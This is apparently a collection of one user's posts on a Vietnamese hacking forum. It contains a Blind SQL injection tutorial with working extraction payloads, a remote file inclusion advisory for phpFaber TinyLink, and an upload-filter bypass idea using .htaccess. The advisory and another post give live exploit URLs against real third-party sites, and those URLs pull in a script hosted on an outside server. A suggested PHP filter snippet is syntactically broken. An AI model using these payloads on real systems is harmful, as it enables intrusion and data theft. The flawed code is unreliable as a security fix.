|
|
bác doigiobui tính làm chuyện ác đây mà .... ??
phá deepfree để nghiên cứu thì tốt đừng nên phá xong rùi nhét con sâu bọ nào vào máy của người ta nha ...
mọi vấn đề doigiobui cần tìm, có thể search lại trong forum, có nhiều bài viết về việc này rồi đấy, và google.com.vn cũng là người bạn đồng hành của doigiobui nữa đấy !
|
|
|
Script ping bình thường rồi output ra kq được ko thì em biết viết rồi nhưng ý em muốn xem script của anh là để xem đoạn "Nó sleep 1 phút rồi ping. Nếu ping có kết quả thì sleep tiếp . Nếu ping không có kết quả thì đợi vài giây rồi ping tiếp. Nếu sau vài lần thử mà không có kết quả thì gởi mail / sms"
|
|
|
conmale wrote:
Đâu cần zombie gì đâu em? Trên server ở nhà của anh (turn on 24/24) nó có một cái script đơn giản. Nó sleep 1 phút rồi ping. Nếu ping có kết quả thì sleep tiếp ). Nếu ping không có kết quả thì đợi vài giây rồi ping tiếp. Nếu sau vài lần thử mà không có kết quả thì gởi mail / sms.... cái gì đó cũng được.
Nếu cả 2 cùng ngủm thì.... thua :lol .
Từ chỗ anh đến server của HVA chưa hề chập chờn, chỉ có 1 ngày khi cable bị đứt ở Đài Loan thì bị ảnh hưởng. Anh chưa hề thấy có cảnh báo giả xảy ra. Riêng phương pháp monitoring thì có nhiều cách nhưng đối với HVA thì 1 cái script bé tí tẹo là đủ ).
Mạo muội muốn hỏi anh conmale có thể share script test ping đó (dĩ nhiên là edit lại phần packet size của hva) và kỹ thuật config FW để server chỉ reply ping với 1 packet size cụ thể ko ? Em nghĩ cái này hoàn toàn ko có tác hại gì và cũng ko bí mật gì nên hỏi thử, ko biết anh nghĩ sao )
|
|
|
Miror : http://rapidshare.com/files/14718340/ISA_Server_Firewall_2004.pdf
|
|
|
Link mirror :
http://rapidshare.com/files/14761722/EV-SHUTTLE.zip
|
|
|
Nếu muốn nhiều máy hơn thì cung cấp Ip Range nhiều hơn chút, nhưng loại trừ những IP mà ko muốn cho ra internet !
|
|
|
Để hiểu hơn về cách dùng char() hoặc ascii(), mời bạn xem bài viết sau về "Blind SQL Injection" hoặc google.com sẽ giúp bạn !
Bài viết của Pip - Vniss !!
Trước hết phải nói đây là bài cũ rùi, nhưng sau bài này mình sẽ có thêm 1 ví dụ cụ thể chăc sẽ dễ chịu hơn với những ai chưa rõ lắm ( chỉ sợ ai cũng rõ rồi thì phí công wé )
Bài lấy trong kho nhé :
Bài này là bài dịch đầu tay hay sao á
Dựa theo bài viết của : Kevin Spett
Nói qua 1 chút , nếu khai thác theo lỗi SQL injection thông thường ta khai thác qua các error message gửi về từ server .Tuy nhiên 1 số admin đã ngăn việc hiển thị các error message nhưng thật đáng tieec như thế là ko đủ
Nếu như bạn ko nhận được các error message thì đừng lo vì rất có thể chúng ta vẫn khai thác thông tin được qua "blind" sql injection .
Phát hiện lỗi "blind sql injection":
1 URL như sau : http://www.company.com/pressRelease.jsp?pressID=5
và câu lệnh SQL được thực hiện sẽ là :
SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5
để xác định xem nó có bị dinh lỗi blind sql injection ko ta hãy thử thêm vào 1 điều kiện đúng .Ví dụ như:
http://www.company.com/pressRelease.jsp?pressID=5 AND 1=1
và nếu database server thực hiện lệnh
SELECT title,description,releaseDate,body FROM pressReleases WHERE pressID=5 AND 1=1
và nếu ta vẫn được trả về vị trí của http://www.company.com/pressRelease.jsp?pressID=5 thì có nghĩa là nó đã dính lỗi rồi đấy .
Khai thác:
Bây giờ chúng ta sẽ đoán các thông tin của database bằng việc thực hiên các câu hỏi đúng sai với server
Ví dụ : ta sẽ hỏi server xem " có phải user hiện tại là dbo ko?" bằng cách :
http://www.company.com/pressRelease.jsp?pressID=5 AND USER_NAME()='dbo'
( USER_NAME() là 1 hàm của SQL Server trả về tên của user hiện tại )
Nếu user hiện tai đúng là 'dbo' thì chúng ta sẽ được trả về http://www.company.com/pressRelease.jsp?pressID=5 còn nếu ko thì sẽ ko có trang nào được trả về cả.
Hay phải ko các bạn
Bằng cách so sanh các câu hỏi nhỏ với các hàm ta có thể hỏi nhiều câu phức tạp hơn . Sau đây là ví dụ về cách lấy tên của 1 table ( từng chữ 1 )
http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))>109
Lệnh SELECT sẽ yêu cầu tên của table đầu tiên trong database
Hàm substring() sẽ trả về chữ đầu tiên trong kết quả của câu lện
Hàm lower() đơn giản chỉ là chuyển kí tự thành kiêu chữ thường, ko viết hoa.
Hàm ascii() sẽ trả về giá trị ASCII của kí tự đó
Nếu server ko báo lỗi gì thì chúng ta có thể biết rằng tên đầu tiên của table là một chữ sau chữ "m" ( vì trong bảng mã giá trị của chữ "m" là 109 )
tiếp theo :
http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))>116
Nếu báo lỗi tức là ta biết được giá trị ASCII của kí tự đầu tiên này nằm trong khoảng từ chữ "n" đến chữ "t" ( giá trị của t là 116)
Cứ thế thu hẹp dần ta sẽ được giá trị của kí tự đầu tiên sẽ nằm trong khoảng "n" và "o" ( 110 và 111)
Tiếp theo:
http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1,1)))=111
Server ko báo lỗi mà trở về trang http://www.company.com/pressRelease.jsp?pressID=5 <--vậy là ta biết được kí tự đầu tiên của table là "o"
Đoán tiếp kí tự thứ 2 ta làm như sau :
http://www.company.com/pressRelease.jsp?pressID=5 AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 2,1)))>109
(chú ý ta phải đổi đối số từ 1 sang 2 )
và rồi làm lại như thế , dần dân ta sẽ nhân được tên đầy đủ của table ( trong ví dụ này là "orders")
Bài này ko phải là dịch hoàn toàn mà dựa trên sự đọc hiểu của mình và viết lại , nếu các bạn thấy chỗ nào thiếu chính xác thì góp ý nhá ( mong các bạn đừng cười )
À còn đây là 1 chút về bảng mã ASCII cho nhưng bạn nào chưa biết :
1. Bảng mã ASCII :
Bộ kí tự ASCII gồm 256 kí tự được phân bố như sau:
+ 32 kí tự đầu là các kí tự điều khiển ko in được ví dụ như kí tự ENTER ( mã 13) , ký tự ESC ( mã 27)
+ các mã 32-47,58-64,91-96 và 123-127 là các kí tữ đặc biệt như dấu chấm, chấm phẩy , dấu ngoặc , móc , hỏi .....
+ các mã 48-57 là 10 chữ số
+ các mã 65-90 là các chữ cái hoa A->Z
+ các kí tự 97-122 là các chữ cái thường a->z
+ các mã ASSCII là các kí tự đồ họa
Cụ thể hơn bạn có thể viết 1 CT nhỏ bằng pascal , C ...... để liệt kê bảng mã ASCII cho mình
|
|
|
Demo link :
Code:
http://template.gen.tr/php-siteler/photostorage/demo4/include/common_function.php?_config[site_path]=http://www.freewebs.com/camauonline/root/hht.txt?
Nên dùng để nghiên cứu thì hay hơn !! )
|
|
|
Tùy biến code lại chút là ok !!
$link = strtolower($_GET['link']);
$link = explode(".", $link);
if ( ( preg_match("/(php|htaccess|php3|asp|jsp|pl|cgi|aspx)/"), $link[count($link)-2] ) )
{
print "Link không hợp lệ.";
exit;
}
|
|
|
Code:
$link = strtolower($_GET['link']);
$link = explode(".", $link);
if ( $link[count($link)-2] == "php" )
{
print "Link không hợp lệ.";
exit;
}
Kiểm tra link à, nếu là .php thì error, vậy giờ upload cái .htacess lên, dùng mod_rewrite config lại loading .txt thành loading .php, sau đó upload file .txt lên server :-D, vô phương cứu chữa , tốt hơn là ko cho upload file .htacess lên nữa mới ok (chỉ là ý tưởng thôi nha, chưa testing)
|
|
|
sac, thì ra là cái này bên HCE à, không để ý nữa, bửa ngồi cafe + YM! online, thấy thằng em quen gửi cái link bị lỗi qua, nhìn thấy là có thể exploit = include nên exploit thử và gửi lên luôn, nếu là của HCE để HHT chỉnh lại bài viết vậy, thông củm nha :-D
|
|
|
Đang ngồi nhâm nhi cafe, sẵn rãnh tay gửi lên cho bà con giải trí cuối tuần luôn vậy !!
Product name: phpFaber TinyLink
Affected version: 1.x
Type: Remote file inclusion (PHP Include)
Vendor: phpfaber.com
Cái script này dùng để rút ngắn link lại á, giống như là tinyurl vậy, lỗi coding không kỹ của mấy tay coder, đơn giản nó là lỗi PHP Include hay còn một cái tên gọi là : Remote file inclusion
File dính lỗi là : config.php, path đầy đủ là : /tiny_includes/config.php
Khai thác :
require_once("$dir_ws/tiny_includes/i_INI.php");
http://<server>/<path>/tiny_includes/config.php?dir_ws=http://attacker.txt?
Link demo : )
http://sid.to/tiny_includes/config.php?dir_ws=http://www.freewebs.com/camauonline/root/hht.txt?
P/S: Discovered by: black_hat_cr @ VnForce Team
|
|
|
Nhà đang cháy, nhảy vào thế nào cũng bị phỏng thôi!
|
|
|
Cách đơn giản là làm 1 palylist (.asx, .m3u...), sau đó play cái đó - làm như thế đỡ phải nhức đầu thêm !
|
|
|
Em vào đây nghiên cứu thêm nhé :
http://www.discuz.net/
Sau khi download được forum rùi, qua bên http://vtv3.info/Media.html xin bộ skin về, còn được hay không thì cầu may nhé em !!
P/S:
Powered by Discuz! 5.0.0 © 2001-2006 Comsenz Inc.
Processed in 0.059814 second(s), 5 queries , Gzip enabled
|
|
|
Bạn có thể vào đây để download soft về và nghiên cứu thêm nhé !
http://www.decompiler.org/
Một số forum trao đổi về dịch ngược VB đây :
http://www.martin2k.co.uk/vb6/posts/p13.php
http://mangchuyengia.com/khcn/tinhoc/Lap_Trinh/Q_1EEA27D04A
|
|
|
safe_mod bluehost là do người dùng tự set chứ bypass cái gì
|
|
|
Welcome back HVA!!!
|
|
|
|
|
|
|